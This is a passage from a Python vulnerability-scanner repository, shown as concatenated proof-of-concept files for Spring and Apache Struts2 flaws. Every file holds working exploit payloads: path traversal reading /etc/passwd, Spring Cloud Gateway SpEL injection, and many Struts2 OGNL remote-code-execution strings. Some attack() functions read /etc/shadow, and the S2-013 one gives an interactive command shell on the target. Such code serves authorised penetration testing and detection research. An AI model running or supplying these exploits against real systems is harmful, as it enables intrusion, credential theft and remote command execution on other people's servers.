'/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../../../' 13 | payload2 = '/manage/log/view?filename=/etc/hosts&base=../../../../../../../../../../../../' 14 | vurl1 = urllib.parse.urljoin(url, payload1) 15 | vurl2 = urllib.parse.urljoin(url, payload2) 16 | rep1 = requests.get(vurl1, timeout=3) 17 | rep2 = requests.get(vurl2, timeout=3) 18 | if re.search('root:x:', rep1.text) and re.search('localhost', rep2.text): 19 | relsult['vulnerable'] = True 20 | relsult['url'] = url 21 | relsult['verify'] = vurl1 22 | relsult['about'] = 'https://blog.csdn.net/ML_Team/article/details/121032049' 23 | relsult['attack'] = True 24 | return relsult 25 | else: 26 | return relsult 27 | except: 28 | return relsult 29 | 30 | 31 | def attack(url): 32 | try: 33 | input_num = '' 34 | print('[*] 尝试读取/etc/passwd....') 35 | payload = '/manage/log/view?filename={0}&base=../../../../../../../../../../../../' 36 | print('[*] payload: {0}'.format(url + payload.format('/etc/passwd'))) 37 | rep = requests.get(url + payload.format('/etc/passwd'), timeout=3) 38 | print(rep.text) 39 | print('[*] 尝试读取/etc/hosts....') 40 | print('[*] payload: {0}'.format(url + payload.format('/etc/hosts'))) 41 | rep = requests.get(url + payload.format('/etc/hosts'), timeout=3) 42 | print(rep.text) 43 | print('[*] 尝试读取/etc/shadow....') 44 | print('[*] payload: {0}'.format(url + payload.format('/etc/shadow'))) 45 | rep = requests.get(url + payload.format('/etc/shadow'), timeout=3) 46 | print(rep.text) 47 | 48 | return True 49 | except: 50 | return False -------------------------------------------------------------------------------- /pocs/framework/spring/CVE_2022_22947.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | import random, string 5 | import json 6 | 7 | def verify(url): 8 | relsult = { 9 | 'name': 'Spring Cloud Gateway Actuator API SpEL 代码注入 (CVE-2022-22947)', 10 | 'vulnerable': False, 11 | 'attack': False, 12 | } 13 | headers = { 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0', 15 | 'Accept-Encoding': 'gzip, deflate', 16 | 'Accept': '*/*', 17 | 'Accept-Language': 'en', 18 | 'Connection': 'close', 19 | 'Content-Type': 'application/json', 20 | } 21 | try: 22 | cmd = 'id' 23 | timeout = 3 24 | rand_str = ''.join(random.sample(string.digits + string.ascii_letters, 7)) 25 | payload = { 26 | "id": rand_str, 27 | "filters": [{ 28 | "name": "AddResponseHeader", 29 | "args": { 30 | "name": "Result", 31 | "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"%s\"}).getInputStream()))}" % cmd 32 | }}], 33 | "uri": "http://example.com" 34 | } 35 | vurl1 = urllib.parse.urljoin(url, '/actuator/gateway/routes/' + rand_str) 36 | vurl2 = urllib.parse.urljoin(url, '/actuator/gateway/refresh') 37 | rep1 = requests.post(vurl1, timeout=timeout, data=json.dumps(payload), headers=headers, verify=False) 38 | if rep1.status_code == 201: 39 | rep2 = requests.post(vurl2, timeout=timeout, headers=headers, verify=False) 40 | rep3 = requests.get(vurl1, timeout=timeout, headers=headers, verify=False) 41 | if rep2.status_code == 200 and re.search('uid=.+gid=.+groups=.+', rep3.text): 42 | relsult['vulnerable'] = True 43 | relsult['url'] = url 44 | relsult['payload'] = vurl1 45 | relsult['about'] = 'https://mp.weixin.qq.com/s/kCbcKuPqy9Ar-arjMYgUmw' 46 | return relsult 47 | except: 48 | return relsult 49 | -------------------------------------------------------------------------------- /pocs/framework/spring/jolokia_logback_jndi_rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': 'jolokia logback JNDI RCE', 7 | 'vulnerable': False, 8 | 'attack': False, 9 | 'url': url, 10 | 'about': 'https://github.com/LandGrey/SpringBootVulExploit#0x04jolokia-logback-jndi-rce', 11 | } 12 | 13 | try: 14 | vurl = urllib.parse.urljoin(url, '/jolokia/list') 15 | rep = requests.get(vurl, verify=False, timeout=5) 16 | if rep.status_code == 200 and re.search('ch\.qos\.logback\.classic\.jmx\.JMXConfigurator', rep.text) and re.search('reloadByURL', rep.text): 17 | relsult['vulnerable'] = True 18 | return relsult 19 | else: 20 | return relsult 21 | except: 22 | return relsult 23 | 24 | 25 | -------------------------------------------------------------------------------- /pocs/framework/spring/jolokia_realm_jndi_rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': 'jolokia Realm JNDI RCE', 7 | 'vulnerable': False, 8 | 'attack': False, 9 | 'url': url, 10 | 'about': 'https://github.com/LandGrey/SpringBootVulExploit#0x05jolokia-realm-jndi-rce', 11 | } 12 | 13 | try: 14 | vurl = urllib.parse.urljoin(url, '/jolokia/list') 15 | rep = requests.get(vurl, verify=False, timeout=5) 16 | if rep.status_code == 200 and re.search('type=MBeanFactory', rep.text) and re.search('createJNDIRealm', rep.text): 17 | relsult['vulnerable'] = True 18 | return relsult 19 | else: 20 | return relsult 21 | except: 22 | return relsult -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_001.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'S2-001 Remote Code Execution Vulnerability', 8 | 'vulnerable': False 9 | } 10 | try: 11 | s = requests.Session() 12 | response = s.get(url, timeout=3) 13 | forms = re.findall(r'', response.text, re.DOTALL) 14 | for form in forms: 15 | action = re.findall(r'action="([^"]*)"', form)[0] 16 | vulurl = urllib.parse.urljoin(url, action) 17 | inputs = re.findall(r'', form) 18 | first = True 19 | payload = '' 20 | for input in inputs: 21 | try: 22 | p = re.findall(r'name=[\'\"]([^\'\"]+)[\'\"]', input)[0] 23 | if first: 24 | payload += p + '={0}' 25 | first = False 26 | else: 27 | payload += '&' + p + '={0}' 28 | except: 29 | continue 30 | payload = payload.format('%25{43210*40123}') 31 | headers = { 32 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 33 | 'Content-Type': 'application/x-www-form-urlencoded', 34 | } 35 | req = s.post(vulurl, data=payload, headers=headers, timeout=3) 36 | if re.search(r'1733714830', req.text): 37 | relsult['vulnerable'] = True 38 | relsult['method'] = 'POST' 39 | relsult['url'] = vulurl 40 | relsult['position'] = 'data' 41 | relsult['payload'] = payload 42 | return relsult 43 | except: 44 | return relsult 45 | 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_005.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'S2-005 Remote Code Execution Vulnerability', 8 | 'vulnerable': False 9 | } 10 | try: 11 | payload = r'redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27id%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\AAAA%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}' 12 | headers = { 13 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 14 | 'Content-Type': 'application/x-www-form-urlencoded', 15 | } 16 | req = requests.post(url, data=payload, headers=headers, timeout=3) 17 | if re.search('uid=.+ gid=.+ groups=.+', req.text): 18 | relsult['vulnerable'] = True 19 | relsult['method'] = 'POST' 20 | relsult['url'] = url 21 | relsult['position'] = 'data' 22 | relsult['payload'] = payload 23 | return relsult 24 | except: 25 | return relsult 26 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_007.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'S2-007 Remote Code Execution Vulnerablity', 9 | 'vulnerable': False 10 | } 11 | try: 12 | s = requests.Session() 13 | response = s.get(url, timeout=3) 14 | forms = re.findall(r'', response.text, re.DOTALL) 15 | for form in forms: 16 | action = re.findall(r'action="([^"]*)"', form)[0] 17 | vulurl = urllib.parse.urljoin(url, action) 18 | inputs = re.findall(r'', form) 19 | first = True 20 | payload = '' 21 | for input in inputs: 22 | try: 23 | p = re.findall(r'name=[\'\"]([^\'\"]+)[\'\"]', input)[0] 24 | if first: 25 | payload += p + '={0}' 26 | first = False 27 | else: 28 | payload += '&' + p + '={0}' 29 | except: 30 | continue 31 | payload = payload.format(r"'%2b(95221%2b924%2b524)%2b'") 32 | headers = { 33 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 34 | 'Content-Type': 'application/x-www-form-urlencoded', 35 | } 36 | req = s.post(vulurl, data=payload, headers=headers, timeout=3) 37 | if re.search(r'95221924524', req.text): 38 | relsult['vulnerable'] = True 39 | relsult['method'] = 'POST' 40 | relsult['url'] = vulurl 41 | relsult['position'] = 'data' 42 | relsult['payload'] = payload 43 | return relsult 44 | 45 | except: 46 | return relsult 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_008.py: -------------------------------------------------------------------------------- 1 | import re 2 | import requests 3 | import urllib 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'S2-008 Remote Code Execution Vulnerability', 8 | 'vulnerable': False 9 | } 10 | try: 11 | payload1 = r'?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29)' 12 | vulurl = urllib.parse.urljoin(url, payload1) 13 | req = requests.get(vulurl, timeout=3) 14 | if re.search('uid=.+ gid=.+ groups=.+', req.text): 15 | relsult['vulnerable'] = True 16 | relsult['method'] = 'GET' 17 | relsult['url'] = url 18 | relsult['payload'] = vulurl 19 | return relsult 20 | except: 21 | return relsult 22 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_009.py: -------------------------------------------------------------------------------- 1 | import re 2 | import requests 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'S2-009 Remote Code Execution Vulnerability', 9 | 'vulnerable': False 10 | } 11 | hash_flag = 's3uih34saj1kd7827hzf' 12 | payload = r'/ajax/example5?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%22echo%20s3uih34saj1kd7827hzf%22).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]' 13 | payload2 = r'/ajax/example5?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%22s3uih34saj1kd7827hzf%22).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]' 14 | vulurl = urllib.parse.urljoin(url, payload) 15 | vulurl2 = urllib.parse.urljoin(url, payload2) 16 | try: 17 | req = requests.get(vulurl, timeout=3) 18 | req2 = requests.get(vulurl2, timeout=3) 19 | if re.search(hash_flag, req.text): 20 | if re.search(hash_flag, req2.text) and len(req2.text) < len(req.text): 21 | pass 22 | else: 23 | relsult['vulnerable'] = True 24 | relsult['method'] = 'GET' 25 | relsult['url'] = url 26 | relsult['payload'] = vulurl 27 | return relsult 28 | except: 29 | return relsult 30 | 31 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_012.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'S2-012 Remote Code Execution Vulnerability', 8 | 'vulnerable': False 9 | } 10 | try: 11 | s = requests.Session() 12 | response = s.get(url, timeout=3) 13 | forms = re.findall(r'', response.text, re.DOTALL) 14 | for form in forms: 15 | action = re.findall(r'action="([^"]*)"', form)[0] 16 | vulurl = urllib.parse.urljoin(url, action) 17 | inputs = re.findall(r'', form) 18 | first = True 19 | payload = '' 20 | for input in inputs: 21 | try: 22 | p = re.findall(r'name=[\'\"]([^\'\"]+)[\'\"]', input)[0] 23 | if first: 24 | payload += p + '={0}' 25 | first = False 26 | else: 27 | payload += '&' + p + '={0}' 28 | except: 29 | continue 30 | flag = 'tgs72j23u8933j3rxben1' 31 | basic_payload1 = r'%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22echo%22%2C+%22tgs72j23u8933j3rxben1%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D' 32 | basic_payload2 = r'%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22tgs72j23u8933j3rxben1%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D' 33 | payload1 = payload.format(basic_payload1) 34 | payload2 = payload.format(basic_payload2) 35 | headers = { 36 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 37 | 'Content-Type': 'application/x-www-form-urlencoded', 38 | } 39 | req1 = s.post(vulurl, data=payload1, headers=headers, timeout=3) 40 | req2 = s.post(vulurl, data=payload2, headers=headers, timeout=3) 41 | if re.search(flag, req1.text): 42 | if re.search(flag, req2.text) and len(req2.text) < len(req1.text): 43 | pass 44 | else: 45 | relsult['vulnerable'] = True 46 | relsult['method'] = 'POST' 47 | relsult['url'] = vulurl 48 | relsult['position'] = 'data' 49 | relsult['payload'] = payload1 50 | return relsult 51 | except: 52 | return relsult 53 | 54 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_013.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'S2-013/S2-014 Remote Code Execution Vulnerablity', 9 | 'vulnerable': False 10 | } 11 | payload = r'''?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D''' 12 | vulurl = urllib.parse.urljoin(url, payload) 13 | try: 14 | req = requests.get(vulurl, timeout=3) 15 | if re.search('uid=.+ gid=.+ groups=.+', req.text) and req.status_code == 200: 16 | relsult['vulnerable'] = True 17 | relsult['method'] = 'GET' 18 | relsult['url'] = url 19 | relsult['payload'] = vulurl 20 | return relsult 21 | except: 22 | return relsult 23 | 24 | 25 | def attack(url): 26 | try: 27 | cmd = '' 28 | print('[+] 开始执行命令,输出exit退出') 29 | basic_payload = r"?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('{0}').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D" 30 | while cmd != 'exit': 31 | cmd = input('[+] 执行命令> ') 32 | payload = basic_payload 33 | payload = payload.format(cmd) 34 | vulurl = urllib.parse.urljoin(url, payload) 35 | req = requests.get(vulurl, timeout=3) 36 | print('[*] 输出结果:') 37 | print(req.text) 38 | return True 39 | except: 40 | return False 41 | 42 | 43 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_015.py: -------------------------------------------------------------------------------- 1 | import re 2 | import requests 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'S2-015 Remote Code Execution Vulnerablity', 9 | 'vulnerable': False 10 | } 11 | try: 12 | flag = 'e5e67yds88291hshzqml9s0' 13 | payload1 = r'/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20e5e67yds88291hshzqml9s0%27%29.getInputStream%28%29%29%2C%23q%7D.action' 14 | payload2 = r'/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27e5e67yds88291hshzqml9s0%27%29.getInputStream%28%29%29%2C%23q%7D.action' 15 | vulurl1 = urllib.parse.urljoin(url, payload1) 16 | vulurl2 = urllib.parse.urljoin(url, payload2) 17 | 18 | req1 = requests.get(vulurl1, timeout=3) 19 | req2 = requests.get(vulurl2, timeout=3) 20 | if re.search(flag, req1.text): 21 | if re.search(flag, req2.text) and len(req2.text) < len (req1.text): 22 | pass 23 | else: 24 | relsult['vulnerable'] =True 25 | relsult['method'] = 'GET' 26 | relsult['url'] = url 27 | relsult['payload'] = vulurl1 28 | return relsult 29 | 30 | except: 31 | return relsult 32 | 33 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_016.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'S2-016 Remote Code Execution Vulnerability', 9 | 'vulnerable': False 10 | } 11 | try: 12 | flag = 'dqub23akjj21sd2kx75xa123f' 13 | cmd_shell = 'echo+' + flag 14 | payload = r'?redirect:%24%7b%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2c%23f.setAccessible(true)%2c%23f.set(%23_memberAccess%2ctrue)%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec(%22{0}%22).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew+java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b5000%5d%2c%23c.read(%23d)%2c%23genxor%3d%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2c%23genxor.println(%23d)%2c%23genxor.flush()%2c%23genxor.close()%7d' 15 | payload1 = payload.format(cmd_shell) 16 | payload2 = payload.format(flag) 17 | vulurl1 = urllib.parse.urljoin(url, payload1) 18 | vulurl2 = urllib.parse.urljoin(url, payload2) 19 | req1 = requests.get(vulurl1, timeout=3) 20 | req2 = requests.get(vulurl2, timeout=3) 21 | if re.search(flag, req1.text): 22 | if re.search(flag, req2.text) and len(req2.text) < len(req1.text): 23 | pass 24 | else: 25 | relsult['vulnerable'] = True 26 | relsult['method'] = 'GET' 27 | relsult['url'] = url 28 | relsult['payload'] = vulurl1 29 | relsult['exp'] = True 30 | return relsult 31 | except: 32 | return relsult 33 | 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_032.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'S2-032 Remote Code Execution Vulnerablity(CVE-2016-3081)', 9 | 'vulnerable': False 10 | } 11 | try: 12 | flag = 'sdfs7sdh32k4h9ffsj23aqv4mn' 13 | cmd_shell = 'echo+' + flag 14 | payload = r'?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd={0}' 15 | payload1 = payload.format(cmd_shell) 16 | payload2 = payload.format(flag) 17 | vulurl1 = urllib.parse.urljoin(url, payload1) 18 | vulurl2 = urllib.parse.urljoin(url, payload2) 19 | req1 = requests.get(vulurl1, timeout=3) 20 | req2 = requests.get(vulurl2, timeout=3) 21 | if re.search(flag, req1.text): 22 | if re.search(flag, req2.text) and len(req2.text) < len(req1.text): 23 | pass 24 | else: 25 | relsult['vulnerable'] = True 26 | relsult['method'] = 'GET' 27 | relsult['url'] = url 28 | relsult['payload'] = vulurl1 29 | return relsult 30 | except: 31 | return relsult 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_045.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'S2-045 Remote Code Execution Vulnerablity(CVE-2017-5638)', 9 | 'vulnerable': False 10 | } 11 | try: 12 | headers_payload = { 13 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 14 | 'Content-Type': r'''"%{# context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('abcd',4321*1234)}.multipart/form-data"''' 15 | } 16 | req = requests.post(url, headers=headers_payload, timeout=3) 17 | if req.headers['abcd'] == '5332114': 18 | relsult['vulnerable'] = True 19 | relsult['method'] = 'POST' 20 | relsult['url'] = url 21 | relsult['position'] = 'Content-Type' 22 | relsult['payload'] = headers_payload 23 | return relsult 24 | except: 25 | return relsult 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_046.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import requests 3 | import re 4 | from urllib.parse import urlparse 5 | 6 | q = b'''------WebKitFormBoundaryXd004BVJN9pBYBL2 7 | Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',4982935*2545583)}\x00b" 8 | Content-Type: text/plain 9 | 10 | foo 11 | ------WebKitFormBoundaryXd004BVJN9pBYBL2--'''.replace(b'\n', b'\r\n') 12 | p = b'''POST / HTTP/1.1 13 | Host: localhost:8080 14 | Upgrade-Insecure-Requests: 1 15 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 16 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 17 | Accept-Language: en-US,en;q=0.8,es;q=0.6 18 | Connection: close 19 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2 20 | Content-Length: %d 21 | 22 | '''.replace(b'\n', b'\r\n') % (len(q),) 23 | def verify(url): 24 | relsult = { 25 | 'name': 'S2-046 Remote Code Execution Vulnerablity(CVE-2017-5638)', 26 | 'vulnerable': False 27 | } 28 | try: 29 | oH = urlparse(url) 30 | a = oH.netloc.split(':') 31 | port = 80 32 | if 2 == len(a): 33 | port = a[1] 34 | elif 'https' in oH.scheme: 35 | port = 443 36 | host = a[0] 37 | with socket.create_connection((host, port), timeout=5) as conn: 38 | conn.send(p + q) 39 | req = conn.recv(10240).decode() 40 | if re.search('12684474626105', req): 41 | relsult['vulnerable'] = True 42 | relsult['method'] = 'POST' 43 | relsult['url'] = url 44 | relsult['position'] = 'filename' 45 | relsult['payload'] = r'''Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',42935*2283)}\x00b"''' 46 | return relsult 47 | except: 48 | return relsult 49 | 50 | 51 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_048.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'S2-048 Remote Code Execution Vulnerablity', 9 | 'vulnerable': False 10 | } 11 | try: 12 | vulurl = urllib.parse.urljoin(url, '/integration/saveGangster.action') 13 | payload = r'''name=%24%7B1234*58614%7D&age=%24%7B233*233%7D&__checkbox_bustedBefore=true''' 14 | headers = { 15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 16 | 'Content-Type': 'application/x-www-form-urlencoded', 17 | } 18 | req = requests.post(vulurl, headers=headers, timeout=3, data=payload) 19 | if '72329676' in req.text: 20 | relsult['vulnerable'] = True 21 | relsult['method'] = 'POST' 22 | relsult['url'] = vulurl 23 | relsult['position'] = 'data' 24 | relsult['payload'] = payload 25 | return relsult 26 | except: 27 | return relsult 28 | 29 | 30 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_053.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'S2-053 Remote Code Execution Vulnerablity', 9 | 'vulnerable': False 10 | } 11 | try: 12 | payload = r'''redirectUri=%25%7B526154872*12396111%7D''' 13 | headers = { 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 15 | 'Content-Type': 'application/x-www-form-urlencoded', 16 | } 17 | req = requests.post(url, headers=headers, timeout=3, data=payload) 18 | if '1285306632' in req.text: 19 | relsult['vulnerable'] = True 20 | relsult['method'] = 'POST' 21 | relsult['url'] = url 22 | relsult['position'] = 'data' 23 | relsult['payload'] = payload 24 | relsult['about'] = 'https://github.com/vulhub/vulhub/blob/master/struts2/s2-053/README.zh-cn.md' 25 | return relsult 26 | except: 27 | return relsult 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_057.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'S2-057 远程代码执行漏洞', 9 | 'vulnerable': False 10 | } 11 | try: 12 | vurl1 = urllib.parse.urljoin(url, '$%7B9437*2453%7D/actionChain1.action') 13 | vurl2 = urllib.parse.urljoin(url, '$%7B233*233%7D/actionChain1.action') 14 | req1 = requests.get(vurl1, timeout=3) 15 | req2 = requests.get(vurl2, timeout=3) 16 | if re.search('23148961', req1.text) and re.search('54289', req2.text): 17 | relsult['vulnerable'] = True 18 | relsult['method'] = 'GET' 19 | relsult['url'] = url 20 | relsult['payload'] = vurl1 21 | relsult['about'] = 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-057' 22 | return relsult 23 | except: 24 | return relsult 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_061.py: -------------------------------------------------------------------------------- 1 | import requests,re 2 | import urllib 3 | import urllib.parse as urlparse 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)', 9 